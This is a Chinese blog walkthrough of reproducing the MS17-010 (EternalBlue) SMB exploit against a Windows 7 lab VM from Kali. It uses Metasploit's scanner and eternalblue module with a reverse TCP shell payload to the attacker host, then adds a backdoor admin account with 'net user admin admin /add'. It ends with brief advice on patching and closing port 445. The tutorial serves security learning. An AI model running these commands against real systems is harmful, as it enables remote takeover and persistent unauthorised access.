首页 > 其他分享 >《MS17-010(永恒之蓝)—漏洞复现及防范》

《MS17-010(永恒之蓝)—漏洞复现及防范》

时间:2023-05-25 13:45:04浏览次数:47  
标签:windows 端口 010 ms17 复现 MS17 msf6 smb

作者: susususuao
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

一. 什么是永恒之蓝?

- 永恒之蓝
永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机、邮件槽(mailslot)、命名管道等资源。而永恒之蓝则通过TCP端口(445)和(139)端口来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器里进行一系列的危险操作。 如远程控制木马,获取最高权限等。

- 危害
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。影响版本可以参考MS17-010介绍

二. 复现MS17-010漏洞

1. 环境部署

  • 靶机 : Windows 7虚拟机 IP:192.168.5.139
  • 攻击机 :Kali-Linux-2021虚拟机 IP:192.168.5.133

2. 工具

这里就使用Kali自带的Metasploit工具。
MSF是一款高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。MSF涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。是全球最受欢迎的工具。

3. 开始复现

  • MS17-010漏洞是通过TCP端口445端进行远程代码执行的,所以我们在Kali先对Window 7进行Nmap扫描看看是否开启了445端口。
 # nmap -v 192.168.5.139     //进行端口信息扫描,发现445端口是开发中的。

在这里插入图片描述

  • 通过执行msfconsole指令进行启动
# msfconsole     //启动

在这里插入图片描述

  • 搜索ms17-010相关漏洞利用模块
msf6 > search  ms17_010  //搜索相关模块,其中下面框出的一个是辅助模块一个是攻击模块。

在这里插入图片描述

  • 进入auxiliary辅助模块,对 Window 7进行扫描,查看是否存在漏洞。
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.5.139     //这里直接输入靶机IP,不用输入所在网段。
rhosts => 192.168.5.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 15     //设置线程,越大越快
threads => 15
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options     //查看刚才设置有没有生成
msf6 auxiliary(scanner/smb/smb_ms17_010) > run     //开始运行

在这里插入图片描述这里说明192.168.5.139的主机存在该漏洞,所以我们可以对它进行攻击入侵。

  • 进行exploit攻击模块,配置相关参数开始入侵。
msf6 auxiliary(scanner/smb/smb_ms17_010) > back   //退出辅助模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue    //进入攻击模块
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets   //可以查看那些系统可以复现。
**设置漏洞利用完成后的反弹模块,用以接收回馈信息:**
msf6 exploit(windows/smb/ms17_010_eternalblue) > show  payloads  //查看有哪些载荷
msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell   //过滤出我们需要的载荷
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp   //使用这个载荷
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.5.133   //设置反弹IP地址(Kali)
lhost => 192.168.5.133
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444   //设置反弹端口 
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.5.139   //设置被攻击的目标主机IP(Window 7)
rhosts => 192.168.5.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options  //查看是否设置成功
msf6 exploit(windows/smb/ms17_010_eternalblue) > run    //运行

出现下面显示则说明已经入侵成功
在这里插入图片描述

  • 操控Windows 7
C:\Windows\system32>ipconfig  //我们会发现乱码
C:\Windows\system32>chcp 65001  //改变代码页(65001为UTF-8的代码页) 
chcp 65001
Active code page: 65001
C:\Windows\system32>ipconfig  //这回我们发现可以正常显示了
C:\Windows\system32>net user admin admin /add   创建admin用户,密码为admin。

更多相关用法可以在网上搜索,在这我就不罗列出来了!

三. MS17-010漏洞防范

这里我们知道MS17-010漏洞是利用SMB服务漏洞入侵的,而SMB服务使用的是TCP端口(445)和(139)端口,所以我们可以通过下面方法进行防范,在这我就不在演示了。

  1. 关闭不必要的端口,尤其是445端口。
  2. 打开防火墙,安装安全软件。
  3. 安装对应补丁。

四. 总结

为了维持操作系统的安全性,减少不必要的损失,我们要对操作系统及时进行更新系统,安装相关补丁,关闭不必要的服务和端口。

标签:windows,端口,010,ms17,复现,MS17,msf6,smb
From: https://www.cnblogs.com/su-sds/p/17430927.html

相关文章

  • LLaVA 从零复现 第一天
    1.准备数据1.1预训练数据目前看来数据部分是两类数据,一类是预训练数据需要下载对应的图像这部分数据是过滤版的CC-3M,上面图片量是59w,是300w图像的过滤版本结构{"id":"GCC_train_002582585","image":"GCC_train_002582585.jpg","caption":"oli......
  • Real-Time Water Waves With Wave Particles - cem yuksel - 2010
    摘要:Thisdissertationdescribesthewaveparticlestechniqueforsimulatingwatersurfacewavesandtwowayfluid-objectinteractionsforreal-timeapplications,suchasvideogames.本文描述了用于模拟水面波的波粒子技术和用于视频游戏等实时应用的双向流体-物体......
  • clayui界面库系列教程之五:仿QQ2010风格的登录下拉框
    预览图如下:                        例子工程下载        这次的例子工程是CLAYUIEXP2,与以前的苹果风格按钮是一个工程,所以在本教程里,关于初始化之类的就不详细解说了,有疑问的请查看本博客内的其他教程        好的,教程开始了。 ......
  • 算法学习记录:[NOIP2010]机器翻译
    题目链接https://ac.nowcoder.com/acm/contest/20960/1003记录:这道题我真的吃......
  • ABB中央处理器PCD230A101 3BHE022291R0101
    PCD230A1013BHE022291R0101PCD235A1013BHE032025R0101PCD235B11013BHE032025R1101CPU出现于大规模集成电路时代,处理器架构设计的迭代更新以及集成电路工艺的不断提升促使其不断发展完善。从最初专用于数学计算到广泛应用于通用计算,从4位到8位、16位、32位处理器,最后到64位处理......
  • 代码复现:基于主从博弈的主动配电网阻塞管理 采用双层模
    代码复现:基于主从博弈的主动配电网阻塞管理采用双层模型进行求解上层决策边际报价,下层求解出清电价和运行方案反馈到上层,反复迭代出结果。上层和下层均采用自适应粒子群算法进行求解考虑四种场景场景1考虑可中断负荷和可调节负荷以及电压约束场景2考虑电动汽车和储能以及电压约束......
  • 【BZOJ2007】【NOI2010】海拔(对偶图,最短路)
    DescriptionYT市是一个规划良好的城市,城市被东西向和南北向的主干道划分为n×n个区域。简单起见,可以将YT市看作一个正方形,每一个区域也可看作一个正方形。从而,YT城市中包括(n+1)×(n+1)个交叉路口和2n×(n+1)条双向道路(简称道路),每条双向道路连接主干道上两个相邻的交叉路口。下图为......
  • matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略。
    matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略。关键词,综合能源系统,碳交易机制,综合需求响应。matlab复现,考虑综合需求响应和阶梯型碳交易机制的综合能源系统优化调度策略。关键词,综合能源系统,碳交易机制,综合需求响应。YID:4280669326294816......
  • 文章复现,考虑综合需求响应和主从博弈的微网优化运行。 关键词:主从博
    文章复现,考虑综合需求响应和主从博弈的微网优化运行。关键词:主从博弈需求响应能量管理主题:含热电联供的智能楼宇群协同能量管理ID:2750652756369640......
  • LITCTF 2023 WEB 复现
    导弹迷踪一:题目信息告诉是js代码,也就是数据都在前端也就是告诉我们直接进去在源代码里找flag 二:窥探代码直接在sources里面找线索,结果一下就找到了,本来还以为需要加密解密啥的。 成功找到flag 1zjs一:题目信息这里给了个提示jsfuckjsfuck:JSFuck是基于JavaScript原......